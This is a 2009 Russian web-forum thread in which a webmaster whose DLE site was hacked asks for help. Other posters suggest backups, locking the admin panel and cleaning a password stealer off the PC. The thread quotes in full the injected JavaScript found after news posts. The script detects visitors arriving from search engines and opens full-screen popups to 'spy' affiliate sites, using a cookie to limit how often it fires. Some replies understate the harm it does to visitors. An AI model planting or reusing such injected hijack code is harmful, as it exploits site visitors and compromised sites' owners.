Что делать если сайт взломали?

Скоро пройдёт.

А если по нормальному ответить? В поиск идти это не совет. Я смотрел, но там дельного ничего нет. Или есть, но не знаю как делать.

воопщето для начала попинать саппорт на наличие бэкапа за предыдущие дни! ;) ну и закрыть админку через htaccess

А если DLE nulled, а не лицензия?

/ru/forum/421715

http://warezbot.ru/showthread.php?t=2524

http://dle.net.ua/forum/index.php?topic=2528.msg18060,msg18060

Спасибо, сейчас почитаем

Helsboy добавил 23.11.2009 в 15:56

А кто-нибудь может сказать, что значит вот такой код в скрипте, который появляется после новостей

function rand( min, max ) { // Generate a random integer

//

// + original by: Leslie Hoare

if( max ) {

return Math.floor(Math.random() * (max - min + 1)) + min;

} else {

return Math.floor(Math.random() * (min + 1));

}

}

function PopShow3() {

CookieTest=navigator.cookieEnabled;

if(CookieTest)

{

ClickUndercookie = GetCookie('clickunder');

if (ClickUndercookie == null)

{

var ssite = new Array();

ssite[1]="http://fonspy.net/?sub=659";

ssite[2]="http://kontaktspy.com/?sub=659";

ssite[3]="http://spyodnoklassniki.com/?sub=659";

ssi=rand(1,3);

var ExpDate = new Date ();

ExpDate.setTime(ExpDate.getTime() + (24 * 60 * 60 * 1000));

SetCookie('clickunder','1',ExpDate, "/");

var cildparntnerka = window.open("javascript:location.href='"+ssite[ssi]+"';","PopWin3","width="+screen.width+",height="+screen.height+",resizable=1,toolbar=1,location=1,menubar=1,status=1,scrollbars=1'");

cildparntnerka.focus();

}

}

}

function GetCookie (name) {

var arg = name + "=";

var alen = arg.length;

var clen = document.cookie.length;

var i = 0;

while (i < clen) {

var j = i + alen;

if (document.cookie.substring(i, j) == arg)

return getCookieVal (j);

i = document.cookie.indexOf(" ", i) + 1;

if (i == 0) break;

}

return null;

}

function SetCookie (name, value) {

var argv = SetCookie.arguments;

var argc = SetCookie.arguments.length;

var expires = (argc > 2) ? argv[2] : null;

var path = (argc > 3) ? argv[3] : null;

var domain = (argc > 4) ? argv[4] : null;

var secure = (argc > 5) ? argv[5] : false;

document.cookie = name + "=" + escape (value) +

((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +

((path == null) ? "" : ("; path=" + path)) +

((domain == null) ? "" : ("; domain=" + domain)) +

((secure == true) ? "; secure" : "");

}

var r=document.referrer,u=document.URL,t="",q;

var page = document.URL.substring(0).split(document.domain)[1];

if(r.indexOf("google.")!=-1){t="q";se="google";}

if(r.indexOf("msn.")!=-1){t="q";se="msn";}

if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";}

if(r.indexOf("altavista.")!=-1){t="q";se="altavista";}

if(r.indexOf("aol.")!=-1){t="query";se="aol";}

if(r.indexOf("ask.")!=-1){t="q";se="ask";}

if(r.indexOf("eureka.com")!=-1){t="q";se="eureka.com";}

if(r.indexOf("lycos.com")!=-1){t="query";se="lycos";}

if(r.indexOf("hotbot.com")!=-1){t="MT";se="hotbot";}

if(r.indexOf("infoseek.com")!=-1){t="qt";se="infoseek.com";}

if(r.indexOf("webcrawler.")!=-1){t="searchText";se="webcrawler";}

if(r.indexOf("excite.")!=-1){t="search";se="excite";}

if(r.indexOf("netscape.com")!=-1){t="search";se="netscape";}

if(r.indexOf("mamma.com")!=-1){t="query";se="mamma";}

if(r.indexOf("alltheweb.com")!=-1){t="query";se="alltheweb.com";}

if(r.indexOf("northernlight.com")!=-1){t="qr";se="northernlight.com";}

if(r.indexOf("rambler.ru")!=-1){t="words";se="rambler.ru";}

if(r.indexOf("aport.ru")!=-1){t="r";se="aport.ru";}

if(r.indexOf("yandex.")!=-1){t="text";se="yandex";}

if(r.indexOf("pingwin.ru")!=-1){t="searchword";se="pingwin.ru";}

if(r.indexOf("www.ru")!=-1){t="Str_Find";se="www.ru";}

if(r.indexOf("punto.ru")!=-1){t="text";se="punto.ru";}

if(r.indexOf("bing.")!=-1){t="text";se="bing";}

if(r.indexOf("gogo.ru")!=-1){t="text";se="gogo.ru";}

if(r.indexOf("mail.ru")!=-1){t="text";se="mail.ru";}

if(r.indexOf("qip.ru")!=-1){t="text";se="qip.ru";}

if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))

{

document.onmouseup=PopShow3;

}

Helsboy, Перед тем как лечить сайт и менять пароли (а это сделать нужно обязательно), лечи свой комп. Скорее всего висит PSW.Panda. (Да, забыл сказать Каспер - это все-таки не антивирус) Когда его отловишь, снеси все все куки и истории во все броизерах, особенно ФФ (если его юзаеш). После этого читстиш пароли в тотал коммандере и прочем... Потом меняеш везде пароли и берешь за правило - все пароли вводятся только явно и никогда ни при каких условиях не запоминаются броузерами и фтп клиентами

T.R.O.N добавил 23.11.2009 в 16:12

обычная партнерка....

попробую. Но думаю это не вирус, а уязвимость в дле 8.2. Только прочитал. Исправил вроде. Ну посмотрим. Мне сейчас интересно что это за скрипт, и какой он мог урон сайту нанести

JS скрипт не может нанести урон.... Даже если очень захочет. Только юзерам + очень редко, санкции со стороны яши, но это редко и долго...

Страшного ничего не вижу в этом скрипте, какой вред наносит ваш взлом?

DLE лицензия или nulled?